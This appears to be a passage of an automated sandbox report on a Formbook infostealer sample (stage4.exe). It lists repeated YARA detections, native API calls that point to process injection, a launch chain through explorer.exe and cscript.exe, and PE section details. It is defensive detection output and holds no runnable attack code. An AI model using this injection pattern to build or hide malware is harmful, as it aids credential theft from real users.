        Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.526444104.0000000005250000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000000.285941222.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.396449038.0000000001774000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000000.00000002.395697071.0000000000E50000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.523558447.0000000003480000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000001.00000000.305769049.000000000F494000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 00000016.00000002.522501930.00000000010D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000000.382178283.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
        Source: 0000000F.00000000.362332180.00000000076F8000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012011740_2_01201174
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121C9A80_2_0121C9A8
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121C9B90_2_0121C9B9
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012010300_2_01201030
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121B8C30_2_0121B8C3
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01202D890_2_01202D89
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01202D900_2_01202D90
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01208C6C0_2_01208C6C
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01208C700_2_01208C70
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121BCDD0_2_0121BCDD
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121BF110_2_0121BF11
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121CF7D0_2_0121CF7D
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01202FB00_2_01202FB0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_05581D5522_2_05581D55
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_05582D0722_2_05582D07
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054B0D2022_2_054B0D20
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_055825DD22_2_055825DD
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054CD5E022_2_054CD5E0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054E258122_2_054E2581
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_0557D46622_2_0557D466
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054C841F22_2_054C841F
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_05581FF122_2_05581FF1
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_0557D61622_2_0557D616
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054D6E3022_2_054D6E30
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_05582EF722_2_05582EF7
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054BF90022_2_054BF900
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054D412022_2_054D4120
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_0557100222_2_05571002
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_055828EC22_2_055828EC
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054CB09022_2_054CB090
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054E20A022_2_054E20A0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_055820A822_2_055820A8
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_05582B2822_2_05582B28
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_0557DBD222_2_0557DBD2
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054EEBB022_2_054EEBB0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_055822AE22_2_055822AE
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EC9A822_2_010EC9A8
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EC9B922_2_010EC9B9
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010D2D8922_2_010D2D89
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010D2D9022_2_010D2D90
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010D8C6C22_2_010D8C6C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010D8C7022_2_010D8C70
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010ECF7D22_2_010ECF7D
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010D2FB022_2_010D2FB0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 054BB150 appears 35 times
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012185D0 NtCreateFile,0_2_012185D0
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01218700 NtClose,0_2_01218700
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012187B0 NtAllocateVirtualMemory,0_2_012187B0
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01218680 NtReadFile,0_2_01218680
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012185CA NtCreateFile,0_2_012185CA
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_012187AA NtAllocateVirtualMemory,0_2_012187AA
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121867C NtReadFile,0_2_0121867C
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9540 NtReadFile,LdrInitializeThunk,22_2_054F9540
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F95D0 NtClose,LdrInitializeThunk,22_2_054F95D0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9710 NtQueryInformationToken,LdrInitializeThunk,22_2_054F9710
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9FE0 NtCreateMutant,LdrInitializeThunk,22_2_054F9FE0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9780 NtMapViewOfSection,LdrInitializeThunk,22_2_054F9780
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9650 NtQueryValueKey,LdrInitializeThunk,22_2_054F9650
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9660 NtAllocateVirtualMemory,LdrInitializeThunk,22_2_054F9660
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F96D0 NtCreateKey,LdrInitializeThunk,22_2_054F96D0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F96E0 NtFreeVirtualMemory,LdrInitializeThunk,22_2_054F96E0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,22_2_054F9910
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F99A0 NtCreateSection,LdrInitializeThunk,22_2_054F99A0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9840 NtDelayExecution,LdrInitializeThunk,22_2_054F9840
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9860 NtQuerySystemInformation,LdrInitializeThunk,22_2_054F9860
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9A50 NtCreateFile,LdrInitializeThunk,22_2_054F9A50
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9560 NtWriteFile,22_2_054F9560
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9520 NtWaitForSingleObject,22_2_054F9520
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054FAD30 NtSetContextThread,22_2_054FAD30
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F95F0 NtQueryInformationFile,22_2_054F95F0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9760 NtOpenProcess,22_2_054F9760
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054FA770 NtOpenThread,22_2_054FA770
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9770 NtSetInformationFile,22_2_054F9770
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054FA710 NtOpenProcessToken,22_2_054FA710
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9730 NtQueryVirtualMemory,22_2_054F9730
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F97A0 NtUnmapViewOfSection,22_2_054F97A0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9670 NtQueryInformationProcess,22_2_054F9670
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9610 NtEnumerateValueKey,22_2_054F9610
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9950 NtQueueApcThread,22_2_054F9950
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F99D0 NtCreateProcessEx,22_2_054F99D0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054FB040 NtSuspendThread,22_2_054FB040
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9820 NtEnumerateKey,22_2_054F9820
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F98F0 NtReadVirtualMemory,22_2_054F98F0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F98A0 NtWriteVirtualMemory,22_2_054F98A0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9B00 NtSetValueKey,22_2_054F9B00
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054FA3B0 NtGetContextThread,22_2_054FA3B0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9A00 NtProtectVirtualMemory,22_2_054F9A00
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9A10 NtQuerySection,22_2_054F9A10
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9A20 NtResumeThread,22_2_054F9A20
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_054F9A80 NtOpenDirectoryObject,22_2_054F9A80
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E85D0 NtCreateFile,22_2_010E85D0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E8700 NtClose,22_2_010E8700
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E87B0 NtAllocateVirtualMemory,22_2_010E87B0
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E8680 NtReadFile,22_2_010E8680
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E85CA NtCreateFile,22_2_010E85CA
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E87AA NtAllocateVirtualMemory,22_2_010E87AA
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E867C NtReadFile,22_2_010E867C
        Source: stage4.exeStatic PE information: No import functions for PE file found
        Source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamecscript.exe` vs stage4.exe
        Source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs stage4.exe
        Source: stage4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\stage4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\stage4.exe "C:\Users\user\Desktop\stage4.exe"
        Source: C:\Users\user\Desktop\stage4.exeProcess created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exeJump to behavior
        Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{660b90c8-73a9-4b58-8cae-355b7f55341b}\InProcServer32Jump to behavior
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.dbJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winEXE@4/0@13/3
        Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\stage4.exeProcess created: C:\Windows\explorer.exe
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: stage4.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: cscript.pdbUGP source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdbUGP source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe, 00000016.00000002.527811538.00000000055AF000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: stage4.exe, 00000000.00000002.396123953.00000000014EF000.00000040.00000001.sdmp, cscript.exe
        Source: Binary string: cscript.pdb source: stage4.exe, 00000000.00000003.395108586.0000000000EAD000.00000004.00000001.sdmp
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0120A13B push ss; iretd 0_2_0120A13D
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121B822 push eax; ret 0_2_0121B828
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121B82B push eax; ret 0_2_0121B892
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121B88C push eax; ret 0_2_0121B892
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01215BCB push FFFFFFBFh; retf 0_2_01215BE9
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_0121B7D5 push eax; ret 0_2_0121B828
        Source: C:\Users\user\Desktop\stage4.exeCode function: 0_2_01215E2F push 7EDC995Dh; retf 0_2_01215E34
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_0550D0D1 push ecx; ret 22_2_0550D0E4
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010DA13B push ss; iretd 22_2_010DA13D
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EB82B push eax; ret 22_2_010EB892
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EB822 push eax; ret 22_2_010EB828
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EB88C push eax; ret 22_2_010EB892
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E5BCB push FFFFFFBFh; retf 22_2_010E5BE9
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EB7D5 push eax; ret 22_2_010EB828
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010E5E2F push 7EDC995Dh; retf 22_2_010E5E34
        Source: C:\Windows\SysWOW64\cscript.exeCode function: 22_2_010EBEC8 pushad ; ret 22_2_010EBEC9
        Source: stage4.exeStatic PE information: section name: .Stone
        Source: initial sampleStatic PE information: section where entry point is pointing to: .Stone
        Source: initial sampleStatic PE information: section name: .text entropy: 7.32674754274